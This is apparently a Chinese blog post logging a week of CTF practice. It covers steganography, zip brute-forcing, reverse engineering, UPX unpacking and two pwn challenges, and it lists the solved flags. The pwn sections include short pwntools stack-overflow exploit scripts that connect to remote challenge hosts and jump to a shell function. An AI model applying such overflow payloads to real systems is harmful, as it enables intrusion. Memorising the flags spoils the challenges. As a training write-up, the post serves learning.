11.22 这周的CTF刷题
1.你竟然趕我走
給了個jpg
直接放到010editor
拉到最下面就有
flag{stego_is_s0_bor1ing}
?
2.大白
一張png
提示都給了
那么這么說的話直接修改一下圖片長寬高就行
crc校驗的知識可以課后補一下,簡單說就是,圖片會隱含一個crc的一串字符,和圖片大小有關,大小改變,crc隨之改變,通過特殊手段可以只顯示一部分圖片,此時,crc不變,但是圖片大小改變 會報錯。通過腳本即可還原全部圖片
?還原后得到flag
3.有N種方法解決
解壓附件
是一個exe,但是不能運行
kali file 命令識別一下,是一個txt
打開發(fā)現(xiàn)是一個base64 但是和圖片ka'l有關系,考base64轉(zhuǎn)圖片
找個在線網(wǎng)站?
轉(zhuǎn)換
再用網(wǎng)站掃描一下二維碼就行
?KEY{dca57f966e4e4e31fd5b15417da63269}
4.烏鎮(zhèn)峰會種圖
其實題目不難
是個jpg圖片
我以為要用stegsolve
然后找不到什么線索
然后看了一下照片屬性,發(fā)現(xiàn)沒有注釋什么的
才20kb
直接在010editor打開
然后flag就在最后面
5.基礎破解
非常基礎
就是用軟件暴力破解壓縮包密碼
提示已經(jīng)給了
四位數(shù)字
然后就爆破出來了
解壓
得到txt 然后base64解密即可
flag{70354300a5100ba78068805661b93a5c}
6.pwn1_sctf_2016
C++是真的看不懂 難受~~
查了wp
關鍵點是看似沒有棧溢出,但是實則有個repalce的函數(shù)可以替換
將I替換成you實現(xiàn)棧溢出 然后再將原來的s重新賦值
總之就是很細節(jié)
然后利用棧溢出
加上原本程序里面有個system的函數(shù)
然后就編寫payload了
from pwn import * io = remote('node4.buuoj.cn', 29190) payload = b'I'*20 + b'k'*0x4 + p32(0x8048F0D)#發(fā)送垃圾字符和函數(shù)地址 io.sendline(payload) io.interactive()7.jarvisoj_level0
一樣的 棧溢出
溢出之后再加上對應的system函數(shù)的地址就行
拿到shell權限之后, 再尋找flag的相關文件就可以
上payload
from pwn import * io=remote('node4.buuoj.cn', 25298) payload = b'a'*(0x80+0x8) +p64(0x400596) io.sendline(payload) io.interactive()?
?
8.reverse 2
還是看wp寫的?
代碼分析有點問題
?wp說的是? 25行 比較輸入值和flag變量,結果為1就輸出 right flag 說明flag變量就是存著flag
的值,然后查看flag
發(fā)現(xiàn)就是hacking_for_fun}
但是上面還有一個字符的替換 在第19行到第23行
(這里我根本看不懂 明明這個函數(shù)就在上面,為什么會影響到下面的s輸入)
這里替換的機制就是將i和r換成1
所以flag是
flag{hack1ng_fo1_fun}
9.內(nèi)涵的軟件
ida32打開
?這里有一個DBAPP{49d3c93df25caad81232130f3d2ebfad}
還有非常像flag?
DBAPP替換flag
試一下
flag{49d3c93df25caad81232130f3d2ebfad}
沒想到就直接ok了
有點意外
10、新年快樂
簡單的脫殼
先查殼?
upx殼
使用的工具是??
?upx靜態(tài)脫殼工具
脫殼即可
然后分析ida32里的內(nèi)容
?分析一下就可以
flag{HappyNewYear!}
總結
以上是生活随笔為你收集整理的11.22 这周的CTF刷题的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 易语言修改服务器数据库连接,sql开发管
- 下一篇: PTA 一 愿天下有情人都是失散多年的兄